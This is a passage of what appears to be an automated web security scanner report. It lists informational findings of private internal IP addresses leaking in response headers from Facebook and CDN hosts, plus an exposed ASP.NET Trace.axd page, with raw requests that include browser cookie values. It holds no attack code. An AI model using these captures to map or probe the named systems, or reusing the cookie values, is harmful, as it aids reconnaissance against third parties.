Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Fri, 01 Jul 2011 01:41:59 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2324
Vary: Accept-Encoding
Cache-Control: public, max-age=27990846
Expires: Tue, 24 Jul 2012 01:39:55 GMT
Date: Sun, 04 Sep 2011 02:25:49 GMT
Connection: close

GIF89aZ."....Tn.Gc.......az.......C`..........Rm....u...........Vp.<Z....]v....g~..........=Z.............[t.Sm.............p..@^.Jf....Qk....=[....`x.Lg..........Fb..........Hd.Yr....Ni.Wp.o.....Mh..
...[SNIP]...

26.28. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/9F14AO7Mj6i.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yy/r/9F14AO7Mj6i.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yy/r/9F14AO7Mj6i.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b8479cc917cf8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff14d95cc52f2d7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 02 Sep 2011 19:07:05 GMT
X-FB-Server: 10.138.17.186
Content-Length: 183339
Vary: Accept-Encoding
Cache-Control: public, max-age=31423328
Expires: Sat, 01 Sep 2012 19:18:41 GMT
Date: Sun, 04 Sep 2011 02:36:33 GMT
Connection: close

/*1314991107,176820666*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

26.29. http://trk.tidaltv.com/Trace.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.tidaltv.com
Path:   /Trace.axd

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Trace.axd?id=0 HTTP/1.1
Host: trk.tidaltv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://trk.tidaltv.com/trace.axd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:56:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13483

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<td>192.168.100.102</td>
...[SNIP]...

26.30. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.115.113
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:24 GMT
Content-Length: 8406

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...

26.31. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.44.101
X-Cnection: close
Date: Sun, 04 Sep 2011 02:41:19 GMT
Content-Length: 8395

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...

26.32. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.235.108
Connection: close
Date: Sun, 04 Sep 2011 04:27:43 GMT
Content-Length: 4251

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...

26.33. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.176.106
X-Cnection: close
Date: Sun, 04 Sep 2011 02:25:48 GMT
Content-Length: 8406

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...

26.34. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 04:30:02 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.146.43
Connection: close
Date: Sun, 04 Sep 2011 04:30:02 GMT
Content-Length: 0


26.35. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6b01f688a268fc70a489a8b444b7d021&app_id=6b01f688a268fc70a489a8b444b7d021&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2453e2dac%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff16b92d1d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36f95cbb4%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff16b92d1d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df307a24cb%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfedb4a7f%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff16b92d1d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df307a24cb&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df745fd614%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff16b92d1d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df307a24cb&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ffd7d864%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff16b92d1d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df307a24cb&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.209.49
X-Cnection: close
Date: Sun, 04 Sep 2011 02:39:39 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=f745fd614&origin=http\u00253A\u00252F\u00252Ftimesofindia.indiatimes.com\u00252Ff16b92d1d&relation=parent&transport=postmessage&frame=f307a24cb",
...[SNIP]...

26.36. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=731d4310e657b3903e3002a6432bca32&extern=0&channel=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.122.61
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:14 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

26.37. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6b01f688a268fc70a489a8b444b7d021&app_id=6b01f688a268fc70a489a8b444b7d021&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c076982c%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16a8c2844%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11b5caf%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb776ee8c%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8891b70%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff25229271%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d49b42c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.30
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:14 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=fb776ee8c&origin=http\u00253A\u00252F\u00252Ftimesofindia.indiatimes.com\u00252Ff25229271&relation=parent&transport=postmessage&frame=f5d49b42c",
...[SNIP]...

26.38. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6b01f688a268fc70a489a8b444b7d021&app_id=6b01f688a268fc70a489a8b444b7d021&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df371f46f74%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff3d5aaf92%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19cb6d71c%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff3d5aaf92%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df341c52e8c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df263244b44%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff3d5aaf92%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df341c52e8c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc018b52%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff3d5aaf92%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df341c52e8c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a298961c%26origin%3Dhttp%253A%252F%252Ftimesofindia.indiatimes.com%252Ff3d5aaf92%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df341c52e8c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/topic/Xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.189.37
X-Cnection: close
Date: Sun, 04 Sep 2011 02:33:56 GMT
Content-Length: 263

<script type="text/javascript">
parent.postMessage("cb=fc018b52&origin=http\u00253A\u00252F\u00252Ftimesofindia.indiatimes.com\u00252Ff3d5aaf92&relation=parent&transport=postmessage&frame=f341c52e8c",
...[SNIP]...

26.39. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=731d4310e657b3903e3002a6432bca32&extern=0&channel=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.191.31
X-Cnection: close
Date: Sun, 04 Sep 2011 02:40:11 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

26.40. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.24.31
Connection: close
Date: Sun, 04 Sep 2011 04:30:06 GMT
Content-Length: 22

Invalid Application ID

26.41. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Friends-of-The-Nation/147232991936

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/Friends-of-The-Nation/147232991936 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/NationNews
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFriends-of-The-Nation%2F147232991936; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.44
Connection: close
Date: Sun, 04 Sep 2011 04:29:35 GMT
Content-Length: 0


26.42. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe4d02e3c%26origin%3Dhttp%253A%252F%252Fsocial.ndtv.com%252Ff1ce168994%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.ndtv.com%2Fhome.php&layout=box_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/home.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.128.41
X-Cnection: close
Date: Sun, 04 Sep 2011 03:32:45 GMT
Content-Length: 30818

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.43. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.nationmultimedia.com/home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html&layout=standard&show_faces=true&width=450&action=like&colorscheme=light&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.221.56
X-Cnection: close
Date: Sun, 04 Sep 2011 03:44:37 GMT
Content-Length: 25134

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

26.44. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e55bef2c%26origin%3Dhttp%253A%252F%252Fsocial.ndtv.com%252Ff34ffa9824%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.ndtv.com%2FNDTVProfit&layout=box_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
